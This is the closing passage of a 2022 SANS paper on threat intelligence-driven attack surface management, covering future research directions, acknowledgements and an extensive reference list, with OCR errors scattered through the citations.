a conceptual framework of CTI-ASM to improve eyber resiliency. In addition, this commentary hopefully will encourage researchers to explore CTI-ASM further, thus serving as a basis for future research. Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 19 Empirical research is needed to study CTI-ASM collaborating with defenders applying CTI-ASM in day-to-day work. its real-world contexts by Future research may include a systematic literature review (Siddaway et al., 2019) of DA case studies that apply relevance diagrams, examine corporate tisk attitudes, weigh imperfect information, use possibility and probability trees or sensitivity analysis, or address cognitive and motivational biases. Based on the review, research may experiment to test the hypothesis that bridging a gap between DA and CTI-ASM would improve the quality of CTI-ASM and CTL Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 20 Acknowledgements ‘Thanks to all my Microsoft colleagues for valuable feedback and to Mark Seiden and Jonathan Spring, ‘who helped me improve this commentary’s quality. Views expressed do not necessarily reflect the opinions of Microsoft or any contributor. References Almed, D. (2022, July 21). Critical vulnerability in popular GPS tracker lets hackers remotely control vehicles. HACKREAD. Retrieved from hitps://\vww.hackread.com/vulnerability-gps-tracker-hackers-remotely-control- vehicles! Badhwar, R. (2021), Dynamic measurement of cyber risk. In The CISO’s next frontier. doi.org/10.1007/978-3-030-75354-2_40 Barrett, M. (2018), Framework for Improving Critical Infrastructure Cybersecurity Version 1.1, NIST Cybersecurity Framework, doi.org/10.6028/NIST.CSWP.04162018 Beek, C. (2020). VirusTotal poisoning. perma.ce/NT4Q-UHQD Bong, C. W., Holtby, D. W., & Ng, K. S. (2012). Fuzzy Multicriteria Decision Analysis for Measurement of Document Content Reliability. 2012 Fifth Int’l Symposium on Computational Intelligence and Design. doi.org/10.1109/iscid.2012.227 Brown, R., & Lee, R. M. (2019). The evolution of cyber threat intelligence (CTI): 2019 Sans CTI survey. Sans Institute. perma.cc/BA3A-ZVSS Center for Internet Security Intel & Analysis Working Group [Security Intel]. (n.d.). What is cyber threat intelligence? [Blog post]. perma.ce/SP7X-GSBW. Center for Internet Security [CIS]. (2021, January 12) [2021a]. Automated cyber threat intelligence pilot reduced states’ response times to minutes [Blog post]. perma.ce/7JQ3-NVBE Central Intelligence Agency [CIA]. (n.d.). United States. Central Intelligence Agency - CIA, cia.gov/the-world-factbook/countries/united-states/#people-and-society Last updated 15 June 2022 Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 21 CIS. (2021, June 15) [202La]. Cybersecurity spotlight - Cyber threat indicator sharing, [Blog post]. perma.cc/9T34-DVFK CIS. (2021, June 25) [2021b]. A new vision for cyber threat intelligence at the MS-ISAC [Blog post]. perma.ce/C3HN-S7CS CIS. (2021, November 19) [2021]. Real-time indicator feeds [Blog post]. perma,ce/Q2RD-NG7I ‘The Center for Threat-Informed Defense [(CTID] (2021, May 3) [2021a]. ATT&CK for containers. perma.cc/RKM7-UUCZ CTID. (2021, October 14) [2021b]. ATT&CK workbench. perma.cc/ZN7H-3BQ8 CTID. (2021, October 28) [2021¢]. Mapping ATT&CK to CVE for impact. pel JEN4V-XU9A. CTID. (2022, March 2). Attack flow. perma.cc/VF3Y-EB4H_ Cybersecurity and Infrastructure Security Agency [CISA]. (n.d.). Apache Log4j vulnerability guidance. perma.ce/3637-MSGB Collier, Z. A., DiMase, D., Walters, S., Tehranipoor, M.M., Lambert, J. H., & Linkov, I. (2014). Cybersecurity standards: Managing risk and creating resilience. Computer, 47(9), 70-76. doi.org/10.1109/me.2013.448 Committee of Sponsoring Organizations of the Treadway Commission (COSO). (2017). Enterprise Risk Management Integrating with Strategy Performance. perma.ce/F4TV-P7BX Davis Advisors, D. S. (2009). On success. Marceline, MO: Walsworth publishing company. Dehghantanha, A., Conti, M., & Dargahi, T. (2019). Cyber threat intelligence. Springer. Diogenes, Y., & Shinder, T. (2018). Microsoft Azure security center, Microsoft Press. Diamond, T., Kerman, A., Souppaya, M., Stine, K., Johnson, B., Peloquin, C., Ruffin, V., Simon, M., Sweeney, S., Scarfone, K. (2022) Improving enterprise patching for general ITT systems: Utilizing existing tools and performing processing in better ways. NIST, NIST Special Publ. 1800-31. doi.org/10,6028/NIST.SP. 1800-31 Doerr, E. (2021, July 12). Microsoft to acquire RiskIQ to strengthen cybersecurity of digital transformation and hybrid work [Blog post]. perma.ce/Q4LN-ZA3Z Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 22 Doherty, D., & McKenney, B. (2021). Zero trust architectures: are we there yet? (21~ 1273), MITRE. perma.ce/FB27-7996 Dwivedi, A (2018) Implementing cyber resilient designs through graph analytics assisted model-based systems engineering. 2018. IEEE Int'l Conference on Sofiware Quality, Reliability and Security Companion (ORS-C). doi.org/10.1109/rs-c.2018.0010 Elitzur, A., Puzis, R., & Zilberman, P. (2019). Attack hypothesis generation. 2019 European Intelligence and Security Informatics Conference (EISIC). doi: 10.1 109/EISIC49498.2019.9 108886. Estrin, E. (2022). Cloud security handbook. Packt Publishing. Gartner Enterprise Risk Management Research Team [Gartner]. (2021, March 29) (2021). 2021 ERM risk response accelerator for cyber risks — topic guide: ERM's role and frameworks (ID No. G00743265 -). [GARTNER is a registered trademark and service mark of Gartner, Ine. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.) petma.ce/SHJV-ZZ3M Gartner. (2021, March 29) [2021b]. 202/ ERM Risk Response Accelerator for Cyber Risks — Topic Guide: Controls, Threats, and Consequences (ID No. G00748842) perma.ce/Y85L-LRB4 Ginty, S. (2022, April 20). Discover the anatomy of an external eyberattack surface with new RiskIQ report. perma.ce/UH2P-9T4X Godyla, N., & Nickels, K. (2021, June 22), Strategies, tools, and frameworks for building an effective threat intelligence team [Blog post]. perma.ce/MHSQ-MC6V. Gourisetti, S. N., Mylrea, M., & Patangia, H. (2020). Cybersecurity vulnerability mitigation framework through empirical paradigm (CyFEr): Prioritized gap analysis IEEE Systems Journal, 14(2), 1897-1908. doi.org/10.1109/jsyst.2019.2913141 Gylling, A., Ekstedt, M., Afzal, Z., & Eliasson, P. (2021). Mapping cyber threat intelligence to probabilistic attack graphs. 2021 IEEE International Conference on Cyber Security and Resilience (CSR). doi:10.1109/esr51186.2021.9527970 Hallum, C. (2021, December 6). Protect printers, cameras, and the rest of your loT devices starting today! [Microsoft blog post] perma.cc/QZ4E-T7LY Hamilton, E. (2021, July 20). What are cyber-physical attacks? The Science Times. Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 23 Harvard Business Review [HBR]. (2021, July 19). Pulse survey / Cybersecurity in the era of intelligence and an expanding attack surface. Analytic Services rm /HR¢ RVK Harvard Law School Forum on Corporate Governance [Harvard]. (2022, April 11). Proposed SEC cyber rules: A game changer for public companies. perma.ce/BXF6- 6v7G Heuer, R. J. (2019). Psychology of intelligence analysis. Pickle Partners Publishing. Hong, Z., Li, S., & Yu, L. (2020). Accelerating update of approximations under a dominance relation. JEEE Access, 8, 146472- 146482. doi.org/10.1109/access.2020.3015813 Howard, R. A., & Abbas, A. E. (2016). Foundations of decision analysis global edition. Harlow, England: Pearson Education Limited. Howard, R. A., & Matheson, J. E. (1989). Readings on the principles and applications of decision analysis vol. I. Sdg Decision Systems. Hutchins, E.M.; Cloppert, M.J.; Amin, R.M. (2011) Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Lead. Issues Inf. Warf. Secur. Res. 2011, 1, 80. perma.ce/DN4K-XQLE IDC. (2022, April 27) [2022a]. Global cybersecurity market implications of the Russia- Ukraine war webinar, perma.cc/U7AB-YLFK TDC. (2022, May 12) [2022b]. Worldwide digital transformation investments forecast to reach $1.8 trillion in 2022, according to new IDC spending guide. perma.ce/UCQ3- Kral International Organization for Standardization [ISO]. (2020) Security and resilience — business continuity management systems — guidance on the use of ISO 22301 (ISO international standard no, 223 13:2020(E). perma.ce/CT7K-BKN6 Jakkal, V. (2022, May 9). Building a safer world together with our partners introducing, Microsoft security experts. perma.ce/3AYC-BZVT Joint Task Force (2018). Risk management framework for information systems and organizations (NIST), NIST Special Publ. 800-37, Rev. 2. doi.org/10.6028/NIST.SP.800-3712 Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 24 Kazmi, S. A., & Naarananoja, M. (2014). Significance of management system for effective organizational management. GSTF International Journal on Business Review (GBR), 3(2). doi.org/! 1540706. Kriaa, S., & Chaabane, Y. (2021). SecKG: Leveraging attack detection and prediction using knowledge graphs. 202/ 12th International Conference on Information and ‘Communication Systems (ICICS). doi: 10.1109/ICICS52457.2021,9464587 Kumar, S. (2022, March 3). Cybercrime: A clear and present danger. Security Magazine. perma.cc/6T7S-UCSS Lee, R. M., & Brown, R. (2021). 2021 SANS Cyber Threat Intelligence (CTI) Survey. perma.ce/SU9Z-BR44 Lin, H., Burnett, D., Sheaffer, D.A., & Arnold, E. (2009). Applying decision analysis, process to exterior physical security system technology design and selection. 43rd Annual 2009 International Carnahan Conference on Security Technology, 312-316. doi: 10.1109/CCST.2009.5335519 Mavroeidis, V., Hohimer, R., Casey, T., & Jesang, A. (2021). Threat actor type inference and characterization within cyber threat intelligence. 2021 13th International Conference on Cyber Conflict (CyCon). doi: 10.23919/CyConS 1939.2021.9468305. McAfee Enterprise [McAfee], & FireEye. (2021, November 9). Cyber threats have increased 81% since global pandemic. perma.ce/7L8W-KXX7 McMillan, R., Poulsen, K., & Volz, D. (2022, March 28). Secret world of pro-Russia hacking group exposed in leak. Wall Street Journal [WSJ] perma.cc/S7WP-PIOT Microsoft Corp. [Microsoft] (2019). Why use Jupyter for security investigations? — msticpy 1.7.5 documentation. perma.cc/Q467-DDTS Microsoft (2020, September 22). Microsoft delivers unified SIEM and XDR to modernize security operations. Microsoft Security Blog. perma.cc/V6A5S-IDKG Microsoft (2021, April 1) [2021a]. Automating threat actor tracking: Understanding attacker behavior for intelligence and contextual alerting. Microsoft Security Blog. perma.ce/3W4Z-6M3R Microsoft (2021, August 13) [2021b]. Attackers use Morse code, other encryption ‘methods in evasive phishing campaign. Microsoft Security Blog. perma.ce/A6EB- TH2S Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 25 Microsoft (2021, October) [2021c]. Microsoft digital defense report ~ Microsofi security. rma.ce/AY24-ZQ73 Microsoft (2021, November 18) [2021d]. Connect your threat intelligence platform to Microsoft Sentinel. perma.ce/$MM7-DUSR Microsoft (2021, November 19) [2021e]. External attack surface management: Intelligent defense in the age of digital transformation, perma.cc/UA9H-4VY A Microsoft. (2021, December 11) [2021f]. Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability. perma.ce/IY7A-SWYQ Microsoft (2022, January 11) [2022a]. Inside Microsoft 365 defender: Mapping attack chains from cloud to endpoint. Microsoft Security Blog. perma.ce/SSB5-UXXD Microsoft (2022, March 7) [2022c]. Kusto query language (KQL) overview- Azure data explorer | Microsoft docs. perma.ce/3VVG-ZEN6 Microsoft (2022, April 19) [20224]. The mobile attack surface goes beyond major mobile app stores. Security Insider. perma.ce/PH89-ZND8 Microsoft (2022, April 19) [202g]. Anatomy of an external attack surface: Threat actors don't have to compromise assets to attack an organization or its customers. perma.ce/GSES-MZGR Microsoft (2022, May 9) [20224]. Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself. Microsoft Security Blog. perma.ce/EBW7-U9SK Microsoft (2022, May 11) [2022h]. Failure Modes in Machine Learning - Security documentation | Microsoft Doc. perma.cc/AX6S-ASHZ Microsoft (2022, May 17) [202i]. Understand and use attack surface reduction (ASR). Developer tools, technical documentation, and coding examples | Microsoft Does. perma.ce/D9DH-T55Z Microsoft (2022, June 14) [2022e]. Threat intelligence integration in Microsoft Sentinel. Developer tools, technical documentation, and coding examples | Microsoft Docs. perma.ce/2S6G-L7LS Microsoft Threat Intelligence Center [MSTIC]. (2021, April 27). MSTICPy v1.0.0 and Jupyter notebooks in Azure Sentinel, an update. perma.cc/9ANN-QL3T Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 26 Ming Li, Weijia Jia and Wei Zhao, "Decision analysis of network-based intrusion detection systems for denial-of-service attacks," 2001 International Conferences on Info-Tech and Info-Net. Proceedings (Cat. No.01EX479), 2001, pp. 1-6 vol.5, doj.org/10.1109/ICII.2001.983485. ‘The MITRE Corp. [MITRE] (2021, June 22). CVE: eve-2021-35244. perma.cc/LGF4- 2CKH MITRE (2022, February 10). After SolarWinds, tamper proofing the cyber ecosystem. perma.ce/HNXS-7TY8 MITRE (n.d.). MITRE ATLAS™ (adversarial threat landscape for artificial-intelligence systems) case studies. perma.ce/JX5S-LGEF MITRE (nd.). MITRE ATT&CK®. perma.ce/GWW8-NTCC R. Mohanani, I. Salman, B. Turhan, P. Rodriguez and P. Ralph, "Cognitive Biases in ering: A Systematic Mapping Study," in IEEE Tran: Software Engineering, vol. 46, no. 12, pp. 1318-1339, 1 Dee. 2020, doi: 10,1 109/TSE.2018.2877759 National Institute of Standards and Technology [NIST] (201 1a). Managing inform: Software En, ns on security risk organization, mission, and information system view (U.S. Dept. of Commerce, Wa., D.C.), NIST Special Publ. 800-39. doi.org/10.6028/NIST.SP.800-39 NIST (2012b). Guide for Conducting Risk Assessments, NIST Special Publ. 800-30. NIST (2016c). Cyber supply chain risk management. perma.cc/WSLD-R7Q7 NIST (20214). Operational technology security. NIST Computer Security Resource Center | CSRC. perma.cc/T9CB-SAFE NIST. (n.d.). Attack surface - Glossary | CSRC. NIST Computer Security Resource Center | CSRC. perma.ce/92GL-KU27 Parkinson, S., Crampton, A., & Hill, R. (2018). Guide to vulnerability analysis for computer networks and systems: An artificial intelligence approach {Springer Computer Communications and Networks series (CCN)]. doi.org/10.1007/978-3-319- 92624-7 PCI Pal. (2019, Sept. 17) [Press Release]. New global research shows poor data security practices have serious consequences for businesses worldwide. perma.ce/YL3K- 96BN Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 27 Pete Shoard and Shilpi Handa, (2021). Hype Cycle for Security Operations, 2021 (ID No. 00747546), perma.cc/6XBU-LPEF Rose, S., Borchert, O., Mitchell, S., Connelly, S. (2020). Zero Trust Architecture, NIST, NIST Special Publ. 800-207. doi.org/10.6028/NIST.SP.800-207 Roy, S., Sharmin, N., Acosta, J. C., Kiekintveld, C., & Laszka, A. (2022). Survey and taxonomy of adversarial reconnaissance techniques. ACM Computing Surveys doi.org/10.1145/3538704 Sargent, J. (2022, February 16). Security perimeter is no more as attack surface continues to expand, SD Times. perma,cc/2PSY-8K4F Schaberreiter, T., Kupfersberger, V., Rantos, K., Spyros, A., Papanikolaou, A., Ilioudis, C., & Quirchmayr, G. (2019). A quantitative evaluation of trust in the quality of eyber threat intelligence sources. Proceedings of the 14th International Conference on Availability, Reliability and Security. doi/10.1145/3339252.3342112 Schlette, D., Caselli, M., & Pernul, G. (2021). A comparative study on cyber threat intelligence: The security incident response perspective. IEEE Communications Su t Tutorials, 23(4), 2525-2556. doi.org/10.1109/COMST.2021 Shankar, R., Kumar, S., & Johnson, A. (2020, October 22). Cyberattacks against machine learning systems are more common than you think [Blog post]. perma.cc/PQW. ‘ADE Shreeve, B., Hallett, J., Edwards, M., Anthonysamy, P., Frey, S., & Rashid, A. (2021), “So if Mr blue head here clicks the link...” risk thinking in cyber security decision making. ACM Transactions on Privacy and Security, 24(1), 1- 29, doi.org/10.1145/3419101 Siddaway AP, Wood AM, Hedges LV. How to do a systematic review: a best practice guide for conducting and reporting narrative reviews, meta-analyses, and meta- syntheses. Annu Rev Psychol 2019 Dec 4;70:747-770 doi.org/10.1146/annurev- psych-010418-102803 Silver, G. (2021, April 26). Managing cybersecurity risk: four options for CEOs, CFOs, and risk officers. Forbes Technology Council. perma.ce/V2CF-ZXUK Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 28 Souppaya, M., Karen, S. (2022). Guide to enterprise patch management planning: preventive maintenance for technology. (NIST), NIST Special Publ. 800-40, Rev. 4. doi.org/10.6028/NIST.SP.800-40r4 Stine, K.M., Quinn, S.D., Ivy, N., Feldman, L., Witte, G.A., & Gardner, R. (2020) Identifying and Estimating Cybersecurity Risk for Enterprise Risk Management (ERM). (NIST), NISTIR 8286. doi.org/10.6028/NIST.IR.8286 Stine, K.M., Quinn, S.D., Ivy, N., Barrett, M., Feldman, L., Witte, G.A., & Gardner, R. (2021) Identifying and Estimating Cybersecurity Risk for Enterprise Risk Management (ERM). (NIST), NISTIR 8286A. doi.org/10.6028/NIST.IR.8286A Smith, G. S. (2022). The new normal in IT: How the global pandemic changed information technology forever. Wiley. Spring, J., Hatleback, E., Householder, A., Manion, A., & Shick, D. (2021). Time to change the CVSS? JEEE Security & Privacy, 19(2), 74-78. doi:10.1109/MSEC.2020,3044475 Spring, J. M. (2022). An analysis of how many undiscovered vulnerabilities remain in information systems. perma.ce/X8HF-3A83 The Open Group. (2021). Zero trust commandments (“Open Group”). perma.cc/M2UQ- AZGS Wang, Y., Zhou, N. Z., Zhang, N., Liu, D., Xing, R., Luan, T. H., & Shen, X. (2022, April 8). A survey on Metaverse: Fundamentals, security, and privacy. doi.org/10.48550/arXiv.2203.02662 The White House, (2021, October 1). Statement by President Joe Biden on cybersecurity awareness month, perma.ce/77NB-S4YW Wilburn, D., & Schmidt, C. (2022, March 15). Logdshell and endemic vulnerabilities in open-source libraries. perma.ce/M7BL-Q7GY Yale, N., & Zonghao, Y. (2021, January 18). Backdoor attack on deep learning models in mobile apps. perma.ce/X27Q-62CZ, Yeboah-Ofori, Abel et al. “Cyber Threat Predictive Analytics for Improving Cyber Supply Chain Security.” IEEE Access 9 (2021): 94318-94337. doi.org:10.1109/ACCESS.2021.3087109 Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 29 Yin, Z., Xu, Y., Ma, F., Gao, H., Qiao, L., & Jiang, Y. (2022). Scanner++: Enhanced vulnerability detection of web applications with attack intent synchronization, ACM Transactions on Software Engineering and Methodology. doi.org/10.1145/3517036 Zbakh, M., Elmahdi, K., Cherkaoui, R., & Enniari, $, (2015). A multi-criteria analysis of | intrusion detection architectures in cloud environments. 2015 International Conference on Cloud Technologies and Applications (CloudTech). doi.org/10,1109/cloudtech.2015.7336967 Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.